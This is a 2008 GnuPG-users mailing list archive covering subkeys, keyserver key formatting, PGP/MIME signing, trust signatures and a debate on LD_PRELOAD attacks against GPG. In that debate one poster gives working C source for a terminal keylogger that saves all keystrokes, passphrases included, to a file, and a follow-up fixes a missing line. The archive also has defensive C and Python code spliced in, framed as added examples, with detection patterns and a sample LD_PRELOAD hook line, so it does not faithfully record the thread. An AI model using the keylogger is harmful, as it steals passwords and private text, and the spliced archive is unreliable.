References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com>
Message-ID: <20080611195627.GA4876@jabberwocky.com>

On Wed, Jun 11, 2008 at 10:43:02AM -0400, michael graffam wrote:
> Has anyone read the article in the most recent 2600 regarding using
> LD_PRELOAD to eavesdrop on gnupg?

I read the article. For those who didn't see it, the basic summary is that by using LD_PRELOAD to replace various functions (memcpy and read) underneath a given execution of GPG, you can snoop on what is going on.

> But what concerns me more (and isn't explicitly covered in the
> article) is the ability to inject false randomness into GPG key
> generation, or even change the plaintext going in.
>
> I think the advice to statically link a strcmp and getenv into GPG for
> purposes of checking/scrubbing the environment is a good one.

I don't. The idea of using LD_PRELOAD to play various security games is not a new one. It's fun to play around with and handy for debugging, but it's not a useful attack in the real world.

If the attacker had access to your machine to implement the LD_PRELOAD attack, there are literally dozens of ways they can similarly steal whatever data they are trying to steal. Why do a very complex attack involving replacing libraries when they could just replace the GPG binary itself? Or add a shell script named 'gpg' and put it in your search path ahead of the real gpg? Or turn on typescript by default. Or load a kernel module that changes the meaning of system calls. Or replace the rng with one that isn't random. Or, or, or.

If you don't have control of your computer, you don't have control of your computer full stop.
Having GPG do some extra checks doesn't really help, because the attacker can simply arrange for these extra checks to appear to succeed, or just replace GPG altogether so they don't run.

If I may torture an analogy here, being worried about someone who has access to your computer using LD_PRELOAD to attack you is like being worried that a burglar has a key to your front door... but your front door isn't locked anyway.

David

From rick at rickv.com Wed Jun 11 21:38:17 2008
From: rick at rickv.com (Rick Valenzuela)
Date: Wed, 11 Jun 2008 15:38:17 -0400
Subject: public key different between keyserver and exported file
Message-ID: <485029A9.8010106@rickv.com>

I just created a new primary key and subkeys, and uploaded them to keyservers. Then I exported my public key in ascii-armor, and copied that file to my website. I noticed that the very last few characters were different from what the keyservers had. Each version begins the same, but somewhere they end up different.

Did I mess something up? Should I be worried about this?

You can compare the two here:

At the top of this link is my uploaded public key:
http://keyserver.gingerbear.net:11371/pks/lookup?search=rick+valenzuela&fingerprint=on&op=index
(It is also different at pgp.mit.edu, and at http://sks-keyservers.net/status)

The public key as I exported it from the command line is here:
http://www.rickv.com/publickey.txt

Any help would be appreciated.

Best,
Rick

--
Rick Valenzuela
photographer | reporter
+1 267 694 3642 | www.rickv.com

From rick at rickv.com Wed Jun 11 21:41:05 2008
From: rick at rickv.com (Rick Valenzuela)
Date: Wed, 11 Jun 2008 15:41:05 -0400
Subject: passphrases: the police and subkeys scenario
Message-ID: <48502A51.5030804@rickv.com>

I'm now confused about creating a separate subkey for encrypting, as opposed to creating one keypair that signs and encrypts. The example I've seen around is that if you're set up the subkey way and the police demand the private part of your key, you don't have to sacrifice your primary key, which carries all your signatures. (I hope I said that correctly.)

Well, I understood that as meaning I would have separate passphrases for the subkey and the primary key: Apparently, that's not possible. So then how would this police scenario play out? If supposing then that TSA or some entity forces me to give up my passphrase for decryption purposes, then I've compromised everything, no?

Trying and thinking,
Rick

--
Rick Valenzuela
photographer | reporter
+1 267 694 3642 | www.rickv.com

From lopaki at gmail.com Wed Jun 11 22:24:47 2008
From: lopaki at gmail.com (Scott Lambdin)
Date: Wed, 11 Jun 2008 16:24:47 -0400
Subject: Confused about Sub keys.
In-Reply-To: <1213062867.12670.11.camel@tsg001.mulawa.internal>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal>
Message-ID: <529e76830806111324y244a4567k6dad886af334961f@mail.gmail.com>

Good example of why you need subkeys.

http://www.wsbtv.com/news/15847652/detail.html

On 6/9/08, Simon Dwyer wrote:
>
> Hi everyone,
>
> I am new to all this and have been doing a lot of reading.
>
> One thing I can't get my head around is subkeys. I have generated a sub
> key with my master key and I understand that. All the commands and things
> I have been doing I have been using my master key's id... should I be
> actively using my sub key? or does it just use it as I talk to people?
>
> Cheers,
>
> Simon Dwyer

--
CILCIL

From michael.graffam at gmail.com Wed Jun 11 22:31:45 2008
From: michael.graffam at gmail.com (michael graffam)
Date: Wed, 11 Jun 2008 16:31:45 -0400
Subject: LD_PRELOAD attack
In-Reply-To: <20080611195627.GA4876@jabberwocky.com>
References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <20080611195627.GA4876@jabberwocky.com>
Message-ID: <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com>

On Wed, Jun 11, 2008 at 3:56 PM, David Shaw wrote:

> If the attacker had access to your machine to implement the LD_PRELOAD
> attack, there are literally dozens of ways they can similarly steal
> whatever data they are trying to steal. Why do a very complex attack
> involving replacing libraries when they could just replace the GPG
> binary itself?

Replacing the GPG bin requires root. An LD_PRELOAD'ed lib doesn't.

> Or add a shell script named 'gpg' and put it in your
> search path ahead of the real gpg?

Again, root.

> Or turn on typescript by default.

Doesn't save GPG passphrases.

> Or load a kernel module that changes the meaning of system calls. Or
> replace the rng with one that isn't random. Or, or, or.

Root, root, root.

Get it yet? LD_PRELOAD enables attacks against GPG w/o requiring full access to the box. The attacker just needs access to the user's account.

> If you don't have control of your computer, you don't have control of
> your computer full stop.

By that logic, anti-lock brakes are useless because, well.. clearly.. if you don't have control over your car, then you don't have control over your car. In point of fact, it is precisely when you have lost control of your car, that you need anti-lock brakes. I think the same applies here.

> Having GPG do some extra checks doesn't
> really help, because the attacker can simply arrange for these extra
> checks to appear to succeed, or just replace GPG altogether so they
> don't run.

So, you write static-strcmp(), throw it into the code, and in main() you use static-strcmp() to walk the environment pointer. If you find an LD_PRELOAD, you bail.
I am not aware of any way to fake these checks w/o modifying the bin (root!).

> If I may torture an analogy here, being worried about someone who has
> access to your computer using LD_PRELOAD to attack you is like being
> worried that a burglar has a key to your front door... but your front
> door isn't locked anyway.

I don't think this situation is analogous at all, in fact. I think it is more like saying: why be worried about someone having a key to your front door when they can just blow the door apart with a shotgun.

Sure, it's true.. and if your threat model includes shotgun-carrying assailants or hostile root users, it's entirely valid. But what about just some basic hygiene to keep honest people honest? Hell, that's what most REAL locks are for, anyhow.

-M

From deron.meranda at gmail.com Wed Jun 11 21:46:51 2008
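The check michael graffam describes in the message above (a locally defined comparison used to walk the environment pointer, bailing out if LD_PRELOAD is found), written out as an added example; it is not code from GnuPG, from the 2600 article, or from any poster in this thread. The function names and the extra variables LD_LIBRARY_PATH and LD_AUDIT are assumptions of this example.

```c
/* Added example: find and scrub dynamic-loader variables by walking the
 * environment block directly, without calling getenv() or strcmp(). */
#include <stddef.h>

extern char **environ;          /* POSIX: the process environment block */

/* Variables the loader acts on. Everything beyond LD_PRELOAD is an
 * assumption of this example; the thread only names LD_PRELOAD. */
static const char *const loader_vars[] = {
    "LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT", NULL
};

/* Local stand-in for strcmp(): 1 if entry has the form "NAME=...", else 0.
 * It is defined in the program itself, so the comparison does not go
 * through a libc function that a preloaded library may have replaced. */
int entry_is_var(const char *entry, const char *name)
{
    while (*name != '\0') {
        if (*entry != *name)    /* also stops at the end of a short entry */
            return 0;
        entry++;
        name++;
    }
    return *entry == '=';       /* "LD_PRELOADED=1" must not match */
}

/* 1 if the entry sets any of the loader variables listed above. */
int is_loader_entry(const char *entry)
{
    for (size_t i = 0; loader_vars[i] != NULL; i++)
        if (entry_is_var(entry, loader_vars[i]))
            return 1;
    return 0;
}

/* Walk the block; return the first offending "NAME=value" or NULL. */
const char *find_loader_var(char *const *envp)
{
    if (envp == NULL)
        return NULL;
    for (; *envp != NULL; envp++)
        if (is_loader_entry(*envp))
            return *envp;
    return NULL;
}

/* Drop every loader variable from the block in place by compacting the
 * pointer array, so that child processes do not inherit them. Repeated
 * entries are dropped as well. Returns the number of entries removed. */
size_t scrub_loader_vars(char **envp)
{
    size_t dropped = 0;
    char **out = envp;

    if (envp == NULL)
        return 0;
    for (; *envp != NULL; envp++) {
        if (is_loader_entry(*envp))
            dropped++;
        else
            *out++ = *envp;
    }
    *out = NULL;
    return dropped;
}

int main(void)
{
    /* The loader has already acted on LD_PRELOAD before main() runs, so a
     * hit means foreign code may already be in this process. Exit with an
     * error instead of continuing, as the message above suggests. */
    if (find_loader_var(environ) != NULL)
        return 2;
    return 0;
}
```

As David Shaw and Peter Pentchev argue elsewhere in the thread, this covers only the loader variables; it does nothing about a changed PATH or a replaced binary.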
From: deron.meranda at gmail.com (Deron Meranda)
Date: Wed, 11 Jun 2008 15:46:51 -0400
Subject: Signing in RFC3156 PGP/MIME format
Message-ID: <5c06fa770806111246u678913fatf7af38a3d55a87ae@mail.gmail.com>

I can not seem to figure out how to use gpg2 to create signatures in RFC3156 PGP/MIME format; rather than the inline OpenPGP format.

I'm prepared to do all the necessary MIME encapsulation and canonicalization of the first part of the multiple/signed component, but then want to use gpg to produce the signature which would go into the second part, the application/pgp-signature.

First, some clarification would be helpful for those who know: the RFC3156 seems to indicate that the signature's armor-header should be "BEGIN PGP MESSAGE", but then the newer RFC 4880 appears to update this so that "BEGIN PGP SIGNATURE" is to be used instead. Is this a correct interpretation, and/or does it matter?

If there is no direct support or option I haven't found to produce RFC3156 output, what I think might work would be to create the first mime component (complete with the Content-Type and Content-Transfer-Encoding headers) and put it into a file, and then sign that using:

    gpg2 --rfc4880 --armor --sign testdoc.part

Omitting the -t (text) option, because I've already done the canonical line ending conversion, if needed (It could even contain binary attachments, etc., but I would handle all that).

Then I get the *.asc file, which at the end contains a "BEGIN PGP SIGNATURE" armor-encoded signature block. Is that the same thing I would then need to put into the application/pgp-signature mime part? And is there a way to get just that signature block out of gpg without it also including the whole message inlined above it?

Thanks
--
Deron Meranda

From roam at ringlet.net Wed Jun 11 22:55:18 2008
From: roam at ringlet.net (Peter Pentchev) Date: Wed, 11 Jun 2008 23:55:18 +0300 Subject: LD_PRELOAD attack In-Reply-To: <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <20080611195627.GA4876@jabberwocky.com> <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> Message-ID: <20080611205518.GA1172@straylight.m.ringlet.net> On Wed, Jun 11, 2008 at 04:31:45PM -0400, michael graffam wrote: > On Wed, Jun 11, 2008 at 3:56 PM, David Shaw wrote: > > > If the attacker had access to your machine to implement the LD_PRELOAD > > attack, there are literally dozens of ways they can similarly steal > > whatever data they are trying to steal. Why do a very complex attack > > involving replacing libraries when they could just replace the GPG > > binary itself? > > Replacing the GPG bin requires root. An LD_PRELOAD'ed lib doesn't. > > > Or add a shell script named 'gpg' and put it in your > > search path ahead of the real gpg? > > Again, root. Nope. None of these is true. If an attacker has access to *your* account, he has perfectly good access to your shell startup files, and he is perfectly capable of changing your PATH to include a directory of his choosing where he may place any binaries he wants to - and your shell will happily execute them instead of the real system binaries. Or maybe you are in the habit of auditing your .*shrc and .*sh_profile files after each and every login? And then auditing the pager or editor that you audited them with? If so, my hat's off to you, Sir, but this is a level of paranoia that I'm not quite comfortable with :) > > Or turn on typescript by default. > > Doesn't save GPG passphrases. True. > > Or load a kernel module that changes the meaning of system calls. Or > > replace the rng with one that isn't random. Or, or, or. > > > Root, root, root. This, too, is true. > Get it yet?
LD_PRELOAD enables attacks against GPG w/o requiring full access > to the box. The attacker just need access to the user's account. True, too, except that an attacker with access to your account really does have at least seven ways (that pop up in my mind without even thinking too hard) of replacing the gpg or pinentry or whatever binaries without you noticing *at once*. G'luck, Peter -- Peter Pentchev roam at ringlet.net roam at cnsys.bg roam at FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 I am the thought you are now thinking. From yalla at fsfe.org Wed Jun 11 23:30:47 2008
From: yalla at fsfe.org (Alexander W. Janssen) Date: Wed, 11 Jun 2008 23:30:47 +0200 Subject: LD_PRELOAD attack Message-ID: <48504407.10405@fsfe.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 (forwarded this message) michael graffam wrote: > It's easy to solve the problem: all you need is a trusted strcmp() (i.e > one linked directly w/ main() ).. > > Before you do anything else, main() checks the environment pointer with > the trusted strcmp() to make sure LD_PRELOAD isn't present. If it is, > bail with a message. Done. Interesting approach, but even if the variable LD_PRELOAD is empty or doesn't exist, the process running in a compromised shell still runs the preloaded-lib. Even if you have a trusted strcmp(), it wouldn't change the fact that the lib gets loaded anyway. > An LD_PRELOADed lib wouldn't have a chance to get hooked. Well, even if the env-var isn't there, it still gets loaded! Alex. From dshaw at jabberwocky.com Thu Jun 12 01:02:00 2008
From: dshaw at jabberwocky.com (David Shaw) Date: Wed, 11 Jun 2008 19:02:00 -0400 Subject: LD_PRELOAD attack In-Reply-To: <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <20080611195627.GA4876@jabberwocky.com> <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> Message-ID: <20080611230200.GA5042@jabberwocky.com> On Wed, Jun 11, 2008 at 04:31:45PM -0400, michael graffam wrote: > On Wed, Jun 11, 2008 at 3:56 PM, David Shaw wrote: > > > If the attacker had access to your machine to implement the LD_PRELOAD > > attack, there are literally dozens of ways they can similarly steal > > whatever data they are trying to steal. Why do a very complex attack > > involving replacing libraries when they could just replace the GPG > > binary itself? > > > Replacing the GPG bin requires root. An LD_PRELOAD'ed lib doesn't. Try it. I don't have to replace it for everyone - just you, and if I can write to your computer, I can make you run any binary I want. Remember, you own your own shell .rc file. > Or add a shell script named 'gpg' and put it in your > > search path ahead of the real gpg? > > > Again, root. Again, .bashrc. > > Or turn on typescript by default. > > > Doesn't save GPG passphrases. Why would I care about getting your passphrase if I can get everything you typed into the message before it was encrypted? 
Still, just for laughs, here's a hack that will save everything typed on a particular terminal, including passphrases (real error checking and proper handling of sigchld left up to the reader):

#include
#include
#include
#include
#include
#include
#include

int main(int argc,char *argv[])
{
  int master,slave,snoop;
  pid_t pid;
  char byte;

  snoop=open("/tmp/snoop",O_WRONLY|O_CREAT|O_TRUNC,0666);

  pid=fork();
  if(pid)
    {
      struct termios term;

      tcgetattr(0,&term);
      cfmakeraw(&term);
      term.c_lflag&=~ECHO;
      tcsetattr(0,TCSAFLUSH,&term);

      close(slave);

      for(;;)
        {
          if(read(0,&byte,1)==1)
            {
              write(master,&byte,1);
              write(snoop,&byte,1);
            }
        }
    }
  else
    {
      pid=fork();
      if(pid)
        {
          close(slave);

          for(;;)
            {
              if(read(master,&byte,1)==1)
                write(1,&byte,1);
            }
        }
      else
        {
          setsid();
          close(master);
          dup2(slave,0);
          dup2(slave,1);
          dup2(slave,2);
          close(slave);
          execl("/bin/bash","/bin/bash","-i",NULL);
        }
    }

  return 0;
}

> > Or load a kernel module that changes the meaning of system calls. Or
> > replace the rng with one that isn't random. Or, or, or.
> >
> Root, root, root.

Do you seriously think that someone who can write to your user-level account can't get root pretty soon? This can be as complex as reading bugtraq for a while until a buffer overrun comes along, or as simple as arranging for "su" to go somewhere else.

> Get it yet? LD_PRELOAD enables attacks against GPG w/o requiring full access
> to the box. The attacker just need access to the user's account.

I do get it. I'm not convinced that you do. If an attacker has access to the user's account, it's game over. At that point, it's just a question which particular method the attacker will choose to completely own you.

David

From george.davidescu at gmail.com Thu Jun 12 01:10:28 2008
From: george.davidescu at gmail.com (bezna) Date: Wed, 11 Jun 2008 16:10:28 -0700 (PDT) Subject: Questions about trust signatures Message-ID: <17789248.post@talk.nabble.com> Dear GnuPG users, I have some questions regarding use of the tsign command; please don't feel you have to answer all of them at once, just one will do, although I'd like to point out that the one most important to me is #1. I've been doing some reading and experimentation with tsign and I think I have a handle on how the mechanics of it work. A brief aside: David Shaw posted a message (http://lists.gnupg.org/pipermail/gnupg-users/2005-May/025612.html ) providing a link to an article which apparently explained trust signature concepts well ( http://download.cryptoex.com/documents/whitepaper/cex2003-pgp-in-unternehmen-en/Tech%20White%20Paper%202002%20-%20Using%20OpenPGP%20in%20Corporations.pdf ). However, the link appears to be down and searches for the article have turned up nothing. Does anyone (perhaps David himself) have a copy of it, or know where I can obtain it? Thanks in advance; now, my questions: 1) My first question revolves around its application in a real-life scenario. Suppose we have a strictly hierarchical environment, where the validation of certificates depends solely on CAs. In such a scenario, would the users perform trust signatures of a certain level on the CAs, who would then perform trust signatures on CAs lower in the hierarchy (and thus lower in power, since with each link in the trust signature chain the "trust power" represented by the depth allotted to the tsig diminishes until it reaches 1, the terminal value, beyond which the trust chain cannot be extended through empowering other users with tsigs). Consider the following example:

User 1 - tsig of depth 2 --> Root CA - tsig of depth 1 --> Subordinate CA - regular signature --> User 2

Thus, through this chain of trust, User 2's certificate appears valid to User 1.
A similar chain could be traced from User 2 to User 1, or between any other two users in the organization, using the Root CA as a hub for trust signatures; alternatively, only the subordinate CA could be the trusted entity by the users, in the case where that CA is responsible for a department and users don't care about the validity of all the certificates of users outside their own branch in the organization. So my first question is, have I understood the use of this command in a real-world environment correctly? Are there other ways in which it could be applied? Can it be applied in a non-hierarchical context? What I mean by this is, is there some way to get rid of this "depth" functionality and to be able to propagate trust continuously and indefinitely down a chain of users, without having it diminish until it reaches an endpoint? For example ( --> denotes a signature, ==> denotes trust) :

A ==> B ==> C ==> D --> E

Through this chain of trust, Eve's certificate appears valid to Alice. The implementation of this example using GPG trust signatures would involve using descending orders (the "depth" parameter) of trust signatures with each hop:

A =3=> B =2=> C =1=> D --> E

Obviously this "depth" parameter is better suited to the CA example outlined earlier; it might not be possible for Alice (or any other user in the chain) to know how many hops away Eve is, and what depth to tsign Bob with so that she will validate Eve's certificate. Furthermore, if Bob tsigned Carmen with a depth of 4 (for his own purposes), the chain of trust linking Eve to Alice would be broken since GPG computes certificate validity (and trust in the case of tsigns) only down paths where each next node in the path was tsigned with a lower "depth" than the "depth" of the tsign on the node before it. Is there some way to circumvent this in GPG, short of writing your own code? Does the PGP Corporation's program offer any alternatives? That was the main question I wanted to address.
Now, here are some other issues I have with tsign: 2) I noticed that when two disjoint, continuous (not broken by a tsign assigning only "marginal" trust somewhere) paths of tsigns of the same length lead to the same certificate at the end of the path, the signature which was last made is taken into computing that terminal certificate's trust rating, rather than some other criteria. This is hard to explain without an example, so here it is:

    Root CA 1 --> CA 1
   /                  \
  A                    B --> C
   \                  /
    Root CA 2 --> CA 2

Bob's certificate has been validated in two companies he works for. Alice wishes to find the validity of Charlotte's certificate, who was signed by Bob. She has tsigned the Root CAs of both companies (with a depth of 3 for the sake of the example). Now, the subaltern CA (tsigned with a depth of 2) of Company 1 has tsigned Bob (with a depth of 1) and specified that he was fully trustworthy when it came to validating certificates. The subaltern CA of Company 2 though, had also tsigned Bob but according to him Bob is only marginally trustworthy. According to the current GPG implementation, CA2's signature which is the most recent would be used in determining Bob's ownertrust in Alice's trust database! Consequently Charlotte's certificate would appear marginally valid. This to me seems flawed. If CA1's signature was made before CA2's (assume CA1 is a procrastinator), then Bob would appear as fully trustworthy to Alice and Charlotte would be validated. The fact that Bob's trustworthiness to Alice hinges on which CA got his signature in last seems like a bad approach to me. 3) What's the point of masking any depth of a tsign greater than 9 with a T? From what I've seen, a level 11 signature is still different from a level 12 signature and so on. Signatures beyond the threshold of 9 aren't discretized into the same class. 4) What do the "12x" and "13x" mean in the following --with-colons --list-sigs output?
sig:::17:2E62D2D5026D69FA:2008-06-11::6 120::David:13x:
sig:::17:1816F82A9DE5372F:2008-06-11::1 60::Larry:12x:

5) As in question 2, I noticed that if there are two disjoint paths of tsigns that lead to the same certificate and one path is shorter (suppose Root CA 2 signed Bob's certificate directly), the shorter path is preferred over the longer one. Are there any other rules for determining which path of tsigns is used, using criteria such as the level of certitude in the signature (3 for "checked very carefully", 2 for "checked casually", or 1 [or 0]), the depth of the signature, and so on? The only other "rule" I seemed to find was the one mentioned in question 2, with the newest trust signature winning over the older ones. That's all for now. Thanks for reading. Please note that Question 1 is my priority, so please don't feel you have to answer all the questions or all of them at once. Thank you, George -- View this message in context: http://www.nabble.com/Questions-about-trust-signatures-tp17789248p17789248.html Sent from the GnuPG - User mailing list archive at Nabble.com. From faramir.cl at gmail.com Thu Jun 12 02:11:36 2008
From: faramir.cl at gmail.com (Faramir) Date: Wed, 11 Jun 2008 20:11:36 -0400 Subject: LD_PRELOAD attack In-Reply-To: <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <20080611195627.GA4876@jabberwocky.com> <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> Message-ID: <485069B8.1040708@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 michael graffam wrote: >> Or turn on typescript by default. > > > Doesn't save GPG passphrases. Is typescript some sort of keylogger? If it is, I don't see any reason why a keylogger can't catch the gpg passphrase (warning: there may be a very good reason for that, it is me the one that doesn't see it). > Or load a kernel module that changes the meaning of system calls. Or > replace the rng with one that isn't random. Or, or, or. > > > Root, root, root. Am I right when I think root is like "admin" in windows (not exactly the same, but the same idea?) Is LD_PRELOAD a concern for windows users? (I figure it is, since, as far as I understood, the reason to use LD_PRELOAD is for portability of code) >> Having GPG do some extra checks doesn't >> really help, because the attacker can simply arrange for these extra >> checks to appear to succeed, or just replace GPG altogether so they >> don't run. But maybe it would help if GPG was not in the computer when the attacker had access to it. But anyway, maybe there is a lot of other nasty things that can be crawling in the computer, if somebody had access to it... > Sure, it's true.. and if your threat model includes shotgun-carrying > assailants or hostile root users, it's entirely valid. In fact, there is no need of shotguns, my house door was broken by the simple method of kicking it near the lock. The door itself resisted, but the countersheet got broken (after many translation attempts, I am not sure if I got the right word for the broken thing). But what do I mean?
Maybe there is a simple way to solve the "locked door" problem. It is just that since we are not the kind of people that use to break through locked doors, we don't those ways to do it. > But what about just some basic hygiene to keep honest people honest? > Hell, that's what most REAL locks are for, anyhow. I think we use locks to discourage dishonest people from trying to break in... we know we can't really prevent an attack, but the more hard it is for them to succeed, it becomes less likely they will attempt an attack. So, if there is a way to increase security, I, as end user, would welcome it. But we need to always keep in mind security is never absolute. The only secure computer, is the one stored inside a safe. From dshaw at jabberwocky.com Thu Jun 12 02:57:44 2008
From: dshaw at jabberwocky.com (David Shaw) Date: Wed, 11 Jun 2008 20:57:44 -0400 Subject: LD_PRELOAD attack In-Reply-To: <485069B8.1040708@gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <20080611195627.GA4876@jabberwocky.com> <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> <485069B8.1040708@gmail.com> Message-ID: <20080612005744.GA599@jabberwocky.com> On Wed, Jun 11, 2008 at 08:11:36PM -0400, Faramir wrote: > michael graffam wrote: > > >> Or turn on typescript by default. > > > > > > Doesn't save GPG passphrases. > > Is typescript some sort of keylogger? If it is, I don't see any reason > why a keylogger can't catch the gpg passphrase (warning: there may be a > very good reason for that, it is me the one that doesn't see it). Typescript is sort of an output keylogger. It's mainly used to produce a "script" of a session. It's true that it doesn't record passphrases, but you can write a program that does the same thing. Note, I left out a line of code in the previous example if anyone wants to try it: openpty(&master,&slave,NULL,NULL,NULL); > So, if there is a way to increase security, I, as end user, would > welcome it. But we need to always keep in mind security is never > absolute. The only secure computer, is the one stored inside a safe. Defending against LD_PRELOAD doesn't actually make GPG safer overall. It just makes it more complex. Incidentally, there is a really easy way to "defend" against LD_PRELOAD in GPG: just make it setuid root. GPG is smart enough to see it is setuid root and drop the root privs early, and most dynamic linkers automatically disable LD_PRELOAD for setuid binaries. David From dshaw at jabberwocky.com Thu Jun 12 03:06:54 2008
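The per-account hooks named in this thread, a PATH entry that resolves `gpg` ahead of the system copy and an `LD_PRELOAD` or `PATH` assignment in a shell startup file, can be looked for by an audit run from a clean environment. The following is an added example, not code from any poster or from GnuPG; the function names, patterns, finding labels and sample inputs are constructed assumptions.

```python
import os
import re
import tempfile

# Startup-file lines that install the two per-user hooks discussed in the
# thread. A PATH edit is normal in most rc files: it is reported for review,
# not as proof of tampering. (Constructed heuristic.)
RC_PATTERNS = {
    "sets LD_PRELOAD": re.compile(r"^\s*(?:export\s+)?LD_PRELOAD="),
    "edits PATH": re.compile(r"^\s*(?:export\s+)?PATH="),
}

# Constructed sample of a startup file, not taken from any real account.
SAMPLE_BASHRC = "\n".join([
    "# constructed sample ~/.bashrc",
    "alias ll='ls -l'",
    'export PATH="$HOME/.local/bin:$PATH"',
    "export LD_PRELOAD=/tmp/libhook.so",
])


def is_runnable(path):
    """True if `path` is a regular file with any execute bit set."""
    return os.path.isfile(path) and bool(os.stat(path).st_mode & 0o111)


def audit_path(path_value, command, trusted_dirs):
    """Walk PATH in lookup order and report what precedes the trusted copy."""
    trusted = {os.path.realpath(d) for d in trusted_dirs}
    findings = []
    for entry in path_value.split(os.pathsep):
        real = os.path.realpath(entry or ".")   # an empty entry means the cwd
        runnable = is_runnable(os.path.join(real, command))
        if real in trusted:
            if runnable:
                break            # lookup stops here: the trusted copy wins
            continue
        if runnable:
            findings.append(("shadowed", entry))
            break                # this is the file the shell would execute
        if os.path.isdir(real) and os.access(real, os.W_OK):
            findings.append(("writable-ahead", entry))
    return findings


def audit_rc_text(name, text):
    """Report startup-file lines that assign LD_PRELOAD or PATH."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in RC_PATTERNS.items():
            if pattern.search(line):
                findings.append((name, lineno, label))
    return findings


def audit_environment(env):
    """Report a preload variable already present in the environment."""
    value = env.get("LD_PRELOAD")
    return [("env", "LD_PRELOAD=" + value)] if value else []


def constructed_layout(root):
    """Create a constructed sample tree: a user bin dir and a 'system' dir
    that both hold an executable named gpg, plus an empty writable dir."""
    user_bin = os.path.join(root, "home-bin")
    system_bin = os.path.join(root, "usr-bin")
    scratch = os.path.join(root, "scratch")
    for directory in (user_bin, system_bin, scratch):
        os.makedirs(directory)
    for directory in (user_bin, system_bin):
        target = os.path.join(directory, "gpg")
        with open(target, "w") as handle:
            handle.write("#!/bin/sh\n")
        os.chmod(target, 0o755)
    return user_bin, system_bin, scratch


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        user_bin, system_bin, scratch = constructed_layout(root)
        path_value = os.pathsep.join([scratch, user_bin, system_bin])
        for finding in audit_path(path_value, "gpg", [system_bin]):
            print(finding)
    for finding in audit_rc_text(".bashrc", SAMPLE_BASHRC):
        print(finding)
    for finding in audit_environment(dict(os.environ)):
        print(finding)
```

Run it from a login that does not source the account's own startup files, for the reason the replies above give: an audit started inside the affected shell sees only what that shell lets it see.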
From: dshaw at jabberwocky.com (David Shaw) Date: Wed, 11 Jun 2008 21:06:54 -0400 Subject: public key different between keyserver and exported file In-Reply-To: <485029A9.8010106@rickv.com> References: <485029A9.8010106@rickv.com> Message-ID: On Jun 11, 2008, at 3:38 PM, Rick Valenzuela wrote: > > I just created a new primary key and subkeys, and uploaded them to > keyservers. Then I exported my public key in ascii-armor, and copied > that file to my website. I noticed that the very last few characters > were different from what the keyservers had. Each version begins the > same, but somewhere they end up different. Did I mess something up? > Should I be worried about this? Nothing to worry about. OpenPGP packets can be written in multiple different ways, even though they come out to the same thing in actual usage. You're just seeing a "re-formatting" of your key. David From rick at rickv.com Thu Jun 12 03:20:03 2008 
From: rick at rickv.com (Rick Valenzuela) Date: Wed, 11 Jun 2008 21:20:03 -0400 Subject: public key different between keyserver and exported file In-Reply-To: References: <485029A9.8010106@rickv.com> Message-ID: <485079C3.1000706@rickv.com> Oh, okay. Thank you for clearing that up; I tried searching and found nothing close to addressing this. Rick -- Rick Valenzuela photographer | reporter +1 267 694 3642 | www.rickv.com David Shaw wrote: > On Jun 11, 2008, at 3:38 PM, Rick Valenzuela wrote: >> >> I just created a new primary key and subkeys, and uploaded them to >> keyservers. Then I exported my public key in ascii-armor, and copied >> that file to my website. I noticed that the very last few characters >> were different from what the keyservers had. Each version begins the >> same, but somewhere they end up different. Did I mess something up? >> Should I be worried about this? > > Nothing to worry about. OpenPGP packets can be written in multiple > different ways, even though they come out to the same thing in actual > usage. You're just seeing a "re-formatting" of your key. > > David > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users From sdwyer at spykes.id.au Thu Jun 12 06:18:46 2008 
From: sdwyer at spykes.id.au (Simon Dwyer) Date: Thu, 12 Jun 2008 14:18:46 +1000 Subject: Confused about Sub keys. In-Reply-To: <529e76830806111324y244a4567k6dad886af334961f@mail.gmail.com> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <529e76830806111324y244a4567k6dad886af334961f@mail.gmail.com> Message-ID: <1213244326.5159.0.camel@tsg001.mulawa.internal> Was this a joke or was I meant to actually take something from that? ... or was it never leave your subkeys laying around? :P On Wed, 2008-06-11 at 16:24 -0400, Scott Lambdin wrote: > Good example of why you need subkeys. > > http://www.wsbtv.com/news/15847652/detail.html > > > On 6/9/08, Simon Dwyer wrote: > Hi everyone, > > I am new to all this and have been a lot of reading. > > One thing I can't get my head around is subkeys. I have > generated a sub > key with my master key and I understand that. All the commands > and thing > I have been doing I have been using my master keys id... > should I be > actively using my sub key? or does it just use it as I talk to > people? > > Cheers, > > Simon Dwyer > > > > > > -- > CILCIL From aongenae at gmail.com Thu Jun 12 09:41:12 2008
